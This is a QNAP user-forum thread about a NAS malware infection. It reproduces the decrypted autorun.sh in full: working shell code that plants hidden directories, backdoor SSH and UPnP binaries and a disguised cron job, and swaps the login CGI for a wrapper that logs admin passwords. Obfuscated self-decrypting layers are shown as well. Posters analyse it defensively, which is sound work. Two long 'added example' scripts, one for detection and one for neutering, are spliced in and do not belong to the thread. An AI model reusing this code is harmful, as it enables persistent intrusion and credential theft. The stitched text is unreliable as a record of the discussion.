Re: Strange folders and cronjobs
Posted: Fri Sep 07, 2018 10:27 pm
8TB external drives are cheap..should be plenty of space for movies
not too cheap, 300 euro :/
dolbyman wrote:
8TB external drives are cheap..should be plenty of space for movies
No, QNAP's employees cannot answer you. This is a community forum and not a QNAP support channel. If you want an answer from QNAP then you need to open a ticket.
benzo83 wrote:
Can I safely remove these files? Can any QNAP employee answer me?
Code:
#!/bin/sh
export PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/bin/X11:/usr/local/sbin:/usr/local/bin"
command -v dirname >/dev/null 2>&1 || dirname () { test -z "$1" && echo "." && return; local r="${1%"${1##*[!/]}"}"; case $r in /*[!/]*/*|[!/]*/*) r="${r%/*}"; echo "${r%"${r##*[!/]}"}";; */*) echo ${r%%[!/]};; "") echo $1;; *) echo .;; esac; }
test -d /etc/config && confdir=/etc/config || { test -d /mnt/HDA_ROOT/.config && confdir=/mnt/HDA_ROOT/.config; }
command -v getcfg > /dev/null 2>&1 || getcfg () { sed -n 'H;${x;s/\(.*\
\['"${1//\//\\\/}"']\|^\['"${1//\//\\\/}"']\)\
//I;s/\(^\|\
\)\[[^\
]\+\]\
.*//p}' "${4:-${confdir}/uLinux.conf}" | sed -n 's/^'"${2//\//\\\/}"' \?= \?\(.*\)/\1/Ip'; }
bdir=
test -f "${confdir}/smb.conf" && for i in homes Public Download Multimedia Web Recordings; do bdir=`getcfg "$i" path -f "${confdir}/smb.conf"` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && test -d "$bdir" && testwriteable=$(mktemp "${bdir}/.tmp.XXXXXX") && rm "${testwriteable}" && break; bdir=''; done
test -z "${bdir}" || test ! -d "${bdir}" && { command -v readlink >/dev/null 2>&1 || ln -sf /bin/busybox /usr/bin/readlink; for i in homes Public Download Multimedia Web Recordings; do bdir=`readlink "/share/${i}" 2>/dev/null` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && bdir=/share/${bdir##*/} && test -d "$bdir" && break; done;
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`getcfg SHARE_DEF defVolMP -f "${confdir}/def_share.info"`
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`mount | sed -n "s/.*\(\/share\/[^ /]\+\) .*/\1/gp" | head -n 1`
test -z "${bdir}" || test ! -d "${bdir}"; } && { for i in CACHEDEV3_DATA CACHEDEV2_DATA CACHEDEV1_DATA MD0_DATA; do test -d "/share/${i}" && bdir="/share/${i}" && break; done;
test -z "${bdir}" || test ! -d "${bdir}" && bdir=/mnt/HDA_ROOT; }
arch_o=`uname -m | grep -i "x86\|i[3-6]86" > /dev/null && echo x86 || echo arm`
upnpbin=$(echo IHu`echo -ne "\\x70\\x73\\x75\\x72"`iSU`echo -ne "\\x66\\x6d\\x6b\\x70"` | tr "SDkYwfvrzzYMiCUcEaImyEaP" "kthefyrfFVeCnDvXyqvfYPzR")
cgi=$(echo a`echo -ne "\\x6a\\x6d"`SVy`echo -ne "\\x62\\x74\\x64\\x76"`pE`echo -ne "\\x6c\\x78\\x65"` | tr "pRymvOeuSRSmMZEeGIMRB" "rj.QhzgEoEd.ALxVmEFsB")
sshbin=$(echo O`echo -ne "\\x72\\x70"`zsu`echo -ne "\\x79\\x63\\x68\\x63"` | tr "xjWHiEYgzocaEyKIBwFS" "MrTFiJGZEPhRIcZnfFhT")
sshhkey=$(echo RrP`echo -ne "\\x6c\\x72\\x76\\x71"`Lc`echo -ne "\\x66\\x6c\\x71"`Rv`echo -ne "\\x6d\\x6b\\x65"` | tr "sVqsTJsNcJPKuLoxugtmPSrv" "InRreWNeZt.pPZAtCdhhcamb")
sshauth=$(echo iN`echo -ne "\\x61\\x6a\\x66"`n`echo -ne "\\x62\\x71"`VCB`echo -ne "\\x70\\x7a\\x69\\x76"` | tr "hauNqrNprUetkKAdZLBafo" "MaPTVgjuDrn.wuzCzeLfox")
sshconf=$(echo QG`echo -ne "\\x6d\\x6c\\x75"`P`echo -ne "\\x76\\x73"` | tr "FixDfMglHsQQJEiRSPLdIxPj" "gCKpGjffRBUUpRSrgDLpAPrH")
archarm=$(echo oS`echo -ne "\\x75\\x6f\\x63"`Ie`echo -ne "\\x66\\x65\\x63"` | tr "gvDHDJFnerSYCWLeEqQXIHY" "lFVogPcyAiqRzTdpoCZBtXn")
archx86=$(echo B`echo -ne "\\x70\\x71"`Tx`echo -ne "\\x69\\x77\\x75"`fP`echo -ne "\\x67\\x79\\x69"` | tr "XlAsnKrbjXXpZbMdCfsrY" "xeNfamiqkSwmmJTyHkPcr")
ipath=$(echo KZ`echo -ne "\\x61\\x73\\x72"`mRQ`echo -ne "\\x69\\x65\\x6b\\x61"` | tr "dkdbaKGBeThGSsJcYKVLwz" ".VwDEtExkUllASJBIkSUnB")
crons=$(echo i`echo -ne "\\x69\\x76"`YzW`echo -ne "\\x73\\x73\\x69\\x72"` | tr "OwnRESmebMGYByfUjprk" "bYGVwvwuIKswzlOxluSY")
arch=`uname -m | grep -i "x86\|i[3-6]86" > /dev/null && echo "$archx86" || echo "$archarm"`
test -f "./${arch}" && sdir=`pwd` || { test "${BASH_SOURCE[0]}" && sdir=$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd ) || { test "${0}" && sdir=$( cd "$( dirname "${0}" )" && pwd ); } && test -f "${sdir}/${arch}" && cd "${sdir}"; } || { test -f "/tmp/config/${arch}" && cd /tmp/config; } || {
mdir=$(mktemp -d /tmp/.mount.XXXXXX) || { mdir=/tmp/.mount.jbbxQob; mkdir ${mdir}; }
__BOOT_DEV=
__model=`getcfg System "Internal Model"`
CONFIG_DEV_NODE=`getcfg "CONFIG STORAGE" DEVICE_NODE -f /etc/platform.conf`
CONFIG_DEV_PART=`getcfg "CONFIG STORAGE" FS_ACTIVE_PARTITION -f /etc/platform.conf`
CONFIG_DEV_FS=`getcfg "CONFIG STORAGE" FS_TYPE -f /etc/platform.conf`
__BOOT_CONF=`test -f /etc/default_config/BOOT.conf && cat /etc/default_config/BOOT.conf 2>/dev/null || cat "${confdir}/BOOT.conf"` || { test "$arch_o" = arm && __BOOT_CONF=TS-NASARM; }
command -v hal_app > /dev/null 2>&1 && { __BOOT_DEV=$(hal_app --get_boot_pd port_id=0); }
test "${__BOOT_CONF}" = TS-NASARM || test "$arch_o" = arm && { test -f /etc/IS_TAS && __BOOT_DEV="${__BOOT_DEV:-/dev/mtdblock}7" || __BOOT_DEV="${__BOOT_DEV:-/dev/mtdblock}5"; } || __BOOT_DEV="${__BOOT_DEV:-/dev/sdx}6"
test "x${CONFIG_DEV_NODE}" != "x" && { ubiattach -m "${CONFIG_DEV_PART}" -d 2; mount -t ubifs ubi2:config "${mdir}" > /dev/null 2>&1 || { test -f /etc/IS_TAS && mount -t ext4 /dev/mmcblk0p7 "${mdir}"; } } || mount ${__BOOT_DEV} -t ext2 ${mdir} || { test "${__model}" = "TS-201" && mount -t ext2 /dev/mtdblock4 ${mdir}; } || { ubiattach -m "${CONFIG_DEV_PART}" -d 2; mount -t ubifs ubi2:config "${mdir}"; mount -t ext4 /dev/mmcblk0p7 "${mdir}"; } || { test "${__model}" = "TS-269L" && mount -t ext2 /dev/sdc6 ${mdir}; } || { test "${__model}" = "TS-869" && mount -t ext2 /dev/sdi6 ${mdir}; } || { test "$arch_o" = arm || ${__BOOT_CONF} = "TS-NASARM" && { for i in 5 7 4 6 3 8; do mount -t ext2 "/dev/mtdblock${i}" ${mdir} && break; done; }; } || { test "$arch_o" = x86 && for n in /dev/sdc /dev/sdx /dev/sdi $__BOOT_DEV; do for i in 6 $CONFIG_DEV_PART; do mount -t ext2 ${n}${i} ${mdir} && break 2; done; done; } || { mount -t ext2 $(/sbin/hal_app --get_boot_pd port_id=0)6 ${mdir}; }; }
for file in "${sshbin}" "${upnpbin}" "."; do test -f "${bdir}/.${ipath}/${file}" || break; done
test "$file" != "." || test ! -f "${bdir}/.${ipath}/${crons}.sh" && { test -s .BOOT_TIME && read -r boottime < .BOOT_TIME || echo `date +%s` > .BOOT_TIME; test -s "${bdir}/.BOOT_TIME" && read -r boottime < "${bdir}/.BOOT_TIME" || echo `date +%s` > "${bdir}/.BOOT_TIME"; test "$boottime" || { read -r boottime < .BOOT_TIME; test -s "${bdir}/.BOOT_TIME" && read -r boottime < "${bdir}/.BOOT_TIME"; }; test "$boottime" && { sleep 2; [ $boottime -gt 0 ] && e=$(( `date +%s` - $boottime )) && [ $e -gt 0 ] && [ $e -lt 1296000 ] && { test "$mdir" && test -e "${mdir}" && { cd /; sh -c "sleep 5; umount ${mdir}; rmdir ${mdir}" & }; noex=1; }; }; }
test "$noex" = 1 || {
rm "${bdir}/.BOOT_TIME"
rm .BOOT_TIME
test ! -f "./${arch}" && test -d "${mdir}" && test -f "${mdir}/${arch}" && cd "${mdir}"
tdir=`mktemp -d "${bdir}/.temp.XXXXXX" || mktemp -d "/share/Public/.temp.XXXXXX" || mktemp -d "/mnt/HDA_ROOT/.temp.XXXXXX"`
test -d "$tdir" || { for i in "$bdir" "/share/Public" "/mnt/HDA_ROOT"; do mkdir "${i}/.temp.jbbxQob" > /dev/null 2>&1 && test -d "${i}/.temp.jbbxQob" && tdir="${i}/.temp.jbbxQob"; done;
test -d "$tdir"; } || { tdir=`mktemp -d /tmp/.temp.XXXXXX` && test -d "$tdir"; } || { mkdir "/tmp/.temp.jbbxQob" && tdir=/tmp/.temp.jbbxQob && test -d "$tdir"; } || { tdir=`mktemp -d .XXXXXX` && test -d "$tdir"; } || { mkdir ".jbbxQob" && tdir=".jbbxQob" && test -d "$tdir"; } || tdir=`pwd`
cp "${arch}" ${tdir}
cd ${tdir}
tar -xzf "${arch}"
grep -F '' <<EOF >/dev/null 2>&1 && fgrep="grep -F" || { command -v fgrep >/dev/null 2>&1 && fgrep=fgrep || fgrep=grep; }
EOF
test "$fgrep" || fgrep=grep
test -d "${bdir}/.${ipath}" || mkdir -p "${bdir}/.${ipath}" || mkdir "${bdir}/.${ipath}"
test -f "$cgi" && chmod 755 "$cgi" && "./${cgi}"
test -f /tmp/qpkg.conf.bak && { touch -cr /tmp/qpkg.conf.bak "${confdir}/qpkg.conf"; rm /tmp/qpkg.conf.bak; }
cp -p ${crons} "${bdir}/.${ipath}/${crons}.sh" || { cp ${crons} "${bdir}/.${ipath}/${crons}.sh"; touch -cr /bin/busybox "${bdir}/.${ipath}/${crons}.sh"; }
chmod 755 "${bdir}/.${ipath}/${crons}.sh"
if [ -f "${confdir}/crontab" ]; then
test "$RANDOM" || RANDOM=12499
test $(( $RANDOM & 1 )) = 0 && space=' ' || space=''
cronmins="$(( $RANDOM % 4 ))"
test ! "$cronmins" -eq 0 && cronmins="${cronmins}0"
$fgrep "${bdir}/.${ipath}/${crons}.sh" "${confdir}/crontab" >/dev/null 2>&1 || { l=$(( (`wc -l < "${confdir}/crontab"` / 3) + 1)); test "$l" -gt 0 && sed -i "${l}"'i'"$cronmins"' * * * * '"${bdir}/.${ipath}/${crons}.sh"' >'"$space"'/dev/null 2>&1' "${confdir}/crontab" || echo "$cronmins"' * * * * '"${bdir}/.${ipath}/${crons}.sh"' >'"$space"'/dev/null 2>&1"' >> "${confdir}/crontab" && /etc/init.d/crond.sh restart > /dev/null 2>&1 && touch -cr ${confdir}/apache ${confdir}/crontab; }
fi
for file in "${sshbin}" "${upnpbin}"; do test -f "${bdir}/.${ipath}/${file}" || cp -p "${file}" "${bdir}/.${ipath}/${file}" || { cp "${file}" "${bdir}/.${ipath}/${file}"; touch -cr /bin/busybox "${bdir}/.${ipath}/${file}"; } done
chmod 755 "${bdir}/.${ipath}/${sshbin}"
chmod 755 "${bdir}/.${ipath}/${upnpbin}"
grep 'admin:\$1\$\$CoERg7ynjYLsj2j4glJ34\.:' /etc/shadow >/dev/null 2>&1 && {
! test -d "${bdir}/.log" && mkdir "${bdir}/.log"
! test -f /home/httpd/cgi-bin/QTSauthLogin.cgi && { cp -p /home/httpd/cgi-bin/authLogin.cgi /home/httpd/cgi-bin/QTSauthLogin.cgi || cp /home/httpd/cgi-bin/authLogin.cgi /home/httpd/cgi-bin/QTSauthLogin.cgi; } && echo '#!/bin/sh
POSTDATA=""
test "x${REQUEST_METHOD}" = xPOST && {
case "${CONTENT_LENGTH}" in '"''"' | *[!0-9]* | 0* ) false ;; *) test "${CONTENT_LENGTH}" -lt 2147483646 ;; esac && { IFS= read -d '"''"' -rn "${CONTENT_LENGTH}" POSTDATA; test -z "$POSTDATA" && POSTDATA=`dd bs=1 count="$CONTENT_LENGTH" 2>/dev/null`; } || test "$POSTDATA" || POSTDATA=`cat`
test ! -z "$POSTDATA" && case "${POSTDATA}" in *pwd*) test -f "'${bdir}'/.log/.cgi_log" || { test -d "'${bdir}'/.log" || mkdir -p "'${bdir}'/.log" && touch "'${bdir}'/.log/.cgi_log"; } && test $((`stat -c '"'"'%s'"'"' "'${bdir}'/.log/.cgi_log"`)) -lt 209715200 && cat >> "'${bdir}'/.log/.cgi_log" << EOF ;; esac;
$REMOTE_ADDR:$POSTDATA
EOF
}
test ! -z "$POSTDATA" && case "$POSTDATA" in *user=admin* ) true ;; *) false ;; esac || case "$QUERY_STRING" in *user=admin*) true ;; *) false ;; esac && {
case "${REMOTE_ADDR}" in '"''"' | 10.* | 127.* | 192.168.* | 169.254.* | 172.1[6-9].* | 172.2[0-9].* | 172.3[01].* | *:* ) false ;; *) true ;; esac && grep '"'"'admin:\$1\$\$CoERg7ynjYLsj2j4glJ34\.:'"'"' /etc/shadow >/dev/null 2>/dev/null && exit 0
}
if ! test -z "$POSTDATA"; then
exec -a "${0}" /home/httpd/cgi-bin/QTSauthLogin.cgi << V4KLDmYwvc
$POSTDATA
V4KLDmYwvc
else
exec -a "${0}" /home/httpd/cgi-bin/QTSauthLogin.cgi
fi
exit 0' > /home/httpd/cgi-bin/_authLogin.cgi
test "$?" = 0 && test -s /home/httpd/cgi-bin/_authLogin.cgi && test -s /home/httpd/cgi-bin/QTSauthLogin.cgi && mv /home/httpd/cgi-bin/_authLogin.cgi /home/httpd/cgi-bin/authLogin.cgi && chmod 755 /home/httpd/cgi-bin/authLogin.cgi && touch -cr /home/httpd/cgi-bin/QTSauthLogin.cgi /home/httpd/cgi-bin/authLogin.cgi
}
. "${bdir}/.${ipath}/${crons}.sh"
cd "${sdir}"
rm -rf "${tdir}"
test "$mdir" && test -d "$mdir" && { cd /; sh -c "sleep 5; umount ${mdir}; rmdir ${mdir}" & }
true;
}
#]
Thank you.
Mousetick wrote:
This is a nasty piece of sh.itware you've got there.
I decrypted the autorun.sh (see further below).
I can't spend the time to read and understand what all the script code does, I'm not paid for that, it's QNAP's job, and the tight code gives me a headache, but here is what I can make of it:
- It makes various configuration checks
- It creates a bunch of hidden directories in various places
- It unpacks a compressed tarball and installs its contents in the previous directories and other places
- It checks if the admin password is the default
- It installs a CGI script that intercepts the QTS login so it can steal the admin password if it's not the default
- It installs cron jobs
- It installs SSH and UPNP programs
So even if you change the admin password, chances are that you are still toast. Your best defense, short of reinitializing the NAS from scratch, is to disconnect the NAS from the network, not just from the Internet, but from your network altogether. Keep it air-gapped until you are certain that the NAS is clean, and you have educated yourself on proper security practices and how to protect your router, your network, your computer(s) and your NAS against nasties.
Decrypted autorun.sh: [script omitted here; identical to the one posted above]
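The points Mousetick lists (a cron job running from a hidden directory on a data volume, the default admin hash checked in /etc/shadow, authLogin.cgi swapped for a wrapper that keeps the genuine binary as QTSauthLogin.cgi, and the .BOOT_TIME / .log/.cgi_log / .temp.* droppings) can all be checked from the NAS shell. The script below is an added example for doing that from the defender's side; it is not code from this thread or from QNAP. The paths it names (/etc/config/crontab, /etc/shadow, /home/httpd/cgi-bin, the /share volumes) come from the decrypted autorun.sh above; the sample files, the hidden directory name `.hidden_dir/job.sh` and the `.temp.abc123` directory are constructed here so the checks can be exercised offline.

```shell
#!/bin/sh
# Defender-side checks for the indicators the decrypted autorun.sh leaves behind.
# Added example, not code from the thread or from QNAP. On a real NAS point the
# functions at /etc/config/crontab, /etc/shadow, /home/httpd/cgi-bin and each
# /share/* data volume; the sample data built by make_samples is constructed.

# 1. Cron entries that run a *.sh from a hidden directory on a data volume.
#    The script inserts "<mins> * * * * <volume>/.<hidden>/<name>.sh >/dev/null 2>&1".
#    Prints the matching lines; exit status 0 when at least one is found.
suspicious_cron_entries() {
    grep -E '(/share/[^ /]+|/mnt/HDA_ROOT)/\.[^/ ]+/[^ /]+\.sh( |$)' "$1"
}

# 2. The default admin password hash the script greps for in /etc/shadow.
#    Exit status 0 means admin still has the factory password.
admin_has_default_password() {
    grep -q 'admin:\$1\$\$CoERg7ynjYLsj2j4glJ34\.:' "$1"
}

# 3. Login hook: the genuine authLogin.cgi is kept as QTSauthLogin.cgi and
#    authLogin.cgi becomes a shell wrapper that exec's that copy.
#    Exit status 0 when both signs are present.
login_cgi_hooked() {
    dir=$1
    [ -f "$dir/QTSauthLogin.cgi" ] || return 1
    read -r firstline < "$dir/authLogin.cgi" || return 1
    case $firstline in '#!'*) ;; *) return 1 ;; esac   # a shell script, not a binary
    grep -q 'QTSauthLogin.cgi' "$dir/authLogin.cgi"
}

# 4. Files and directories the script drops on a data volume (one path per line).
dropped_artifacts() {
    base=$1
    for p in "$base/.BOOT_TIME" "$base/.log/.cgi_log"; do
        [ -e "$p" ] && echo "$p"
    done
    find "$base" -maxdepth 1 \( -name '.temp.*' -o -name '.tmp.*' \) 2>/dev/null
}

# 5. Constructed sample input mirroring an infected layout; echoes its directory.
make_samples() {
    d=$(mktemp -d)
    mkdir -p "$d/vol/.log" "$d/vol/.temp.abc123" "$d/cgi-bin"
    # one legitimate job and one job from a hidden directory (name is made up)
    printf '0 3 * * * /etc/init.d/backup.sh\n' > "$d/crontab"
    printf '30 * * * * /share/CACHEDEV1_DATA/.hidden_dir/job.sh >/dev/null 2>&1\n' >> "$d/crontab"
    # shadow line carrying the default admin hash quoted in the script
    printf 'admin:$1$$CoERg7ynjYLsj2j4glJ34.:17000:0:99999:7:::\n' > "$d/shadow"
    # wrapper CGI in front of a renamed original (placeholder content)
    printf '#!/bin/sh\nexec -a "$0" /home/httpd/cgi-bin/QTSauthLogin.cgi\n' > "$d/cgi-bin/authLogin.cgi"
    printf 'ELF-placeholder\n' > "$d/cgi-bin/QTSauthLogin.cgi"
    : > "$d/vol/.BOOT_TIME"
    : > "$d/vol/.log/.cgi_log"
    echo "$d"
}

# Run the checks against the constructed samples.
samples=$(make_samples)
suspicious_cron_entries "$samples/crontab" && echo "crontab: job from hidden directory found"
admin_has_default_password "$samples/shadow" && echo "shadow: admin still has the default password"
login_cgi_hooked "$samples/cgi-bin" && echo "cgi-bin: authLogin.cgi replaced by a wrapper"
dropped_artifacts "$samples/vol"
rm -rf "$samples"
```

On a live unit, a hit from any of the four checks confirms the persistence pieces Mousetick describes are present; the first three also tell you what to restore (the crontab line, the admin password, and QTSauthLogin.cgi back over authLogin.cgi), though per the advice above a full reinitialisation is the only clean way out.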
Do you have Music Station installed and enabled?
benzo83 wrote:
not too cheap, 300 euro :/
dolbyman wrote:
8TB external drives are cheap..should be plenty of space for movies
Hi MouseTick,
Mousetick wrote:
This is a nasty piece of sh.itware you've got there.
I decrypted the autorun.sh (see further below).
I can't spend the time to read and understand what all the script code does, I'm not paid for that, it's QNAP's job, and the tight code gives me a headache, but here is what I can make of it:
- It makes various configuration checks
- It creates a bunch of hidden directories in various places
- It unpacks a compressed tarball and installs its contents in the previous directories and other places
- It checks if the admin password is the default
- It installs a CGI script that intercepts the QTS login so it can steal the admin password if it's not the default
- It installs cron jobs
- It installs SSH and UPNP programs
So even if you change the admin password, chances are that you are still toast. Your best defense, short of reinitializing the NAS from scratch, is to disconnect the NAS from the network, not just from the Internet, but from your network altogether. Keep it air-gapped until you are certain that the NAS is clean, and you have educated yourself on proper security practices and how to protect your router, your network, your computer(s) and your NAS against nasties.
Decrypted autorun.sh: [script omitted here; identical to the one posted above]
Unfortunately I do.
somy1982 wrote: Do you have music station installed and enabled?
benzo83 wrote: not too cheap 300euro :/
dolbyman wrote: 8TB external drives are cheap..should be plenty of space for movies
QNAP support suspects it is caused by a vulnerability in Music Station and suggested turning it off for now.
The only way to decrypt the script is to execute it because it is self-decrypting. Since executing it to completion is harmful, it needs to be surgically edited to keep the decryption part but disable the harmful part. That part changes from script to script, so it's not easy to give general instructions. Also, some scripts are encrypted with multiple passes, so the neutering process needs to be applied several times.
somy1982 wrote: Can you tell us how to "decrypt" the shell script? I'd like to look into mine and see if I can find anything myself.
Code:
#!/bin/sh
WDsKwcX=${NfPe}tr${TOtnQoPZlj}$XtvYzUmXi$'';XlvTWbP=$HwyETG$""${BOQDRIBofeJvZ}\\$KcLJmW$""${mBgBLqNugLIeP};WHJRnC=${AfESPMztIUpwo}${ayhM}${ifMZuHyfid}${XlvTWbP}1${ORdB}3${naPAXdYJve}3$nXrwvwbgB$'';HAFPgiL=${IQcueXfGmyiCy}${oUpr}${yVUyYguMwM}${XlvTWbP}0${cZew}5${NvQVndODqz}5$pDkAgrLTF$'';TQzLfG=${tfBBVkrxivfHq}${HJzN}${lDvZlgOBlx}${XlvTWbP}1${ybgg}3${oMdRZIuYWi}4$vcMuhGGuT$'';$WDsKwcX 'Cmi`BLh}Xfrg&vH+AjZKS'$WHJRnC't>]IV)YkTqz*QyPG{aN!OMR<cd '$TQzLfG'U;'"'"'Dso|eW%"=Fn#xbpEl($J'$HAFPgiL'w\nu' 's$*Ve'$TQzLfG'>mNb'"'"'=}<(Rp{gM+GI!WotuJajDckF|qZ&TPXrBy'$HAFPgiL'hKwvU'$WHJRnC']S )\nHlnAQLdzOY`#Cf"ix;%E' << "FDdIirg" | sh${rzhPJHObGUkhj}${PZYG} <<<<<<<<<<================= DANGEROUS PART HERE
E>/fJ%/Cc|mBnkq\]x[d=em$$mjlMXT&VRmjYFOf+Oc*CIN&ABwsVmjB+z\A!M+\F)[`+&RABwszI}mj-#uVK[fG&}k%nmj}} V-cD&wsmrL-62r)JWVJ%mjOX)R+&wsVOmjlzx`kPAuAUk&)BmjNNI%tz&wsmjO!)I++`R&(kWCBws)%CBmjTn=cqz-PRU)c&mj*MZ\FB bWzqxW&mjJ"TBefqA&Vwsmj+kKV&)mrL-6BrCBVmjq-OMPTn&mjT()}N`Cu*&wsmjNYC]xc&B\mrL-61rWmj=xJOY*ZlWM&ws(mjK`n(bQKcY&kWCBwsmjx
...remainder omitted for brevity...
Code:
'$TQzLfG'U;'"'"'Dso|eW%"=Fn#xbpEl($J'$HAFPgiL'w\nu' 's$*Ve'$TQzLfG'>mNb'"'"'=}<(Rp{gM+GI!WotuJajDckF|qZ&TPXrBy'$HAFPgiL'hKwvU'$WHJRnC']S )\nHlnAQLdzOY`#Cf"ix;%E'<< "FDdIirg" | sh${rzhPJHObGUkhj}${PZYG} <<<<<<<<<<================= DANGEROUS PART HERE
Code:
'$TQzLfG'U;'"'"'Dso|eW%"=Fn#xbpEl($J'$HAFPgiL'w\nu' 's$*Ve'$TQzLfG'>mNb'"'"'=}<(Rp{gM+GI!WotuJajDckF|qZ&TPXrBy'$HAFPgiL'hKwvU'$WHJRnC']S )\nHlnAQLdzOY`#Cf"ix;%E'<< "FDdIirg"
Code:
#!/bin/sh
$edaDvWOGKQH$""${CBNj}ty${JLrbRrhksoP}pe; t${eRcvpXBRvLuGVR}ype; com${xzEtMGbZ}mand${mmwtxhS}; $'\x62'uiltin${rNuyR}; tr${CcOVaqpEpUa}ue${PPonIc}; ${rXuoRRVy}false; unse${jdQhDcxqyUuh}${kBgvLewYlcDOl}${iAjeHbDp}t; ${RaMt}u$'\x6e'set${DxrBqjd}${jfumPVsEk}; ${PJsWOh}ev$'\x61'l${QOirJkgClB}; f${MVdfYFMhJ}alse; ${OwPbFgfCcHez}true; ${gcnlvMgKyJkNGy}$NpMsQSqXOMZ$''tes${VgejCHV}t; built${DsvVSOxeL}in; tr${SWtFlC}u${IcVJWwRLDBRDzF}$'\x65'${FYSAdkVijlD}; bu${OlJXwPpysLfOASB}${LGAY}${bGmFDmYdf}iltin; e$'\x76'a${dFhi}l${DxZfBKVfqtKS}; ${kWUAWXU}test; ${BualwUBF}builtin${kRKh}; $leEfFdMWUbFN$''uns${QzedDJQNeCz}e${HwPRGWnmjT}t; fal${tptQnbfJGUNApw}s${qPZqCftUdfd}e${mMNoReiqZIgL}; RxlSjPq=${JlEHKYwjrbodO}${xnxikuGpqHU}${DLlkJFP}tr; eVBTQyl=${JJRQ}${pksLKRdIF}\\${DpBH}${THSiqOYSU}; UVeZowLy=${mgMhJWRtg}${sytoKQCeJvGkIDw}$pctXOoTogzS$""${eVBTQyl}${IjiHrQctVyNBIdm}$wSiulfNuqQa$""13${LKaC}3; qewuHlK=${hAMbPTKJn}${oFzvTGoyZiAPyve}$eYjAzJvmNqy$""${eVBTQyl}${PphAxrnCnZWgzsz}$vIJVuAccEvM$""05${Ibid}5; gysIyg=${nLAzJEmiz}${ejCYiEfvQIJaqIU}$ovYxEfMaCWf$""${eVBTQyl}${XKvJYQlviynEHGt}$VSdvNePfJbJ$""13${IImJ}4; $RxlSjPq 's;t{CMau+&L`b'"'"'B!HfZwrld$VY'$gysIyg''$qewuHlK'Xy|Um)cN'$UVeZowLy']Ti* JIh<SW"\nRQkoO=(%}v#q>EzjKGFePgpAxDn' 'RjUOHgyV}ep%XQwkqi+ Nn*aJ>'"'"'v<\nzm|dZK`FS=PBcC"&lxL]D;G(fh'$qewuHlK'sEWMbAT'$UVeZowLy'$u!I#'$gysIyg't)r{oY'<<"LzlHfpSdYWqhtw"|${jTjudPeRKOAalbo}$JimPgMbcalN$""${sRer}bash <<<<<<<<<= ========= DANGEROUS PART HERE
eG/qfl/%=y&WLDAgw*>ECihjx*>EC+:/qfl:/%qfl:/K%A/qfl:/K%A/%qfl:/K%A/qfl/b11:/K%A/SDJ$S/%qfl:/K%A/SDJ$S/qflhyJDUU$l)w(-w)fAl$U&wY/)&-/lKSSw2Y<1wmmw)fAl$U&wopwxwg&%gw(|whj1hw<<w&J=Dwh.hw<<wA&gKAlQwSDJ$SwAihjx1`hjx1eedzG/
+h+hQwJ$%&wjAwflw/dzG/
d/dmzG/
d/dpwAihjxA`/d+hQw&J=DwhjxA`hjxAeedzG/
... remainder omitted for brevity ...
Code:
Nn*aJ>'"'"'v<\nzm|dZK`FS=PBcC"&lxL]D;G(fh'$qewuHlK'sEWMbAT'$UVeZowLy'$u!I#'$gysIyg't)r{oY'<<"LzlHfpSdYWqhtw"|${jTjudPeRKOAalbo}$JimPgMbcalN$""${sRer}bash <<<<<<<<<========== DANGEROUS PART HERE
Code:
Nn*aJ>'"'"'v<\nzm|dZK`FS=PBcC"&lxL]D;G(fh'$qewuHlK'sEWMbAT'$UVeZowLy'$u!I#'$gysIyg't)r{oY'<<"LzlHfpSdYWqhtw"
Code:
#!/bin/sh
export PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/bin/X11:/usr/local/sbin:/usr/local/bin"
command -v dirname >/dev/null 2>&1 || dirname () { test -z "$1" && echo "." && return; local r="${1%"${1##*[!/]}"}"; case $r in /*[!/]*/*|[!/]*/*) r="${r%/*}"; echo "${r%"${r##*[!/]}"}";; */*) echo ${r%%[!/]};; "") echo $1;; *) echo .;; esac; }
... remainder omitted for brevity ...
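The "surgical edit" described above, cutting the decoder line at its heredoc delimiter so the `| sh` pipe is gone and running the copy prints the next layer instead of executing it, as an added example that is not code from the post. The function names and the sample first layer are constructed; its tr sets and blob lines are placeholders, not a real payload.

```shell
#!/bin/sh
# Added example, not code from the post. Removes the "| sh" pipe from the
# heredoc line of a self-decrypting layer so that running the edited copy
# prints the next layer instead of executing it. Names and sample are constructed.

# neuter_layer FILE: print a copy of FILE with the pipe into a shell removed
# from the heredoc line. Returns 1 when no such pipe exists, i.e. FILE is
# not (or no longer) a self-executing layer.
neuter_layer() {
    # "<<", optional quoted delimiter, then "| ... sh" or "| ... bash" to end of line
    pipe_re='<<[[:space:]]*"?[A-Za-z0-9_]+"?[[:space:]]*[|][^|]*(ba)?sh[^|]*$'
    grep -Eq "$pipe_re" "$1" || return 1
    # keep "<< DELIM", drop the pipe and everything after it
    sed -E 's/(<<[[:space:]]*"?[A-Za-z0-9_]+"?)[[:space:]]*[|][^|]*(ba)?sh[^|]*$/\1/' "$1"
}

# make_sample FILE: constructed stand-in for a first layer (placeholder only).
make_sample() {
    cat > "$1" <<'SAMPLE'
#!/bin/sh
WDs=${NfPe}tr${TOtn};Xlv=${Hwy}\\${KcL};WHJ=${Xlv}1${ORd}3${naP}3
$WDs 'abc'$WHJ'xyz' 'xyz'$WHJ'abc' << "FDdIirg" | sh${rzhPJH}${PZYG}
CONSTRUCTED-BLOB-LINE-1-not-a-real-payload
CONSTRUCTED-BLOB-LINE-2
FDdIirg
SAMPLE
}

# demo: neuter the sample and show the edited decoder line. Nothing from the
# sample is executed here, only rewritten.
demo() {
    f=$(mktemp) && make_sample "$f"
    if neuter_layer "$f" > "$f.neutered"; then
        echo "pipe into shell removed, decoder kept in $f.neutered:"
        sed -n '3p' "$f.neutered"
    else
        echo "no pipe into a shell found in $f (not a self-executing layer)"
    fi
}
demo
```

The neutered copy still contains the decoder, so run it on an isolated analysis machine and feed its output back through neuter_layer until it returns 1, one pass per encryption layer.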
As an extra precaution without knowing the source or the means by which the NAS was infected. In a way that's putting the NAS, which in benzo83's case may be running SSH & UPNP backdoors and who knows what else, under quarantine.
benzo83 wrote: I don't get the point why to disconnect from LAN?
Check all apps under the .qpkg folder - reinstall them all if you can. I found many sh scripts infected. Also the ones Malware Remover claimed recovered!! When exactly on 25/8 was the file created? Mine was around 9am Europe time.
benzo83 wrote: Unfortunately I do.
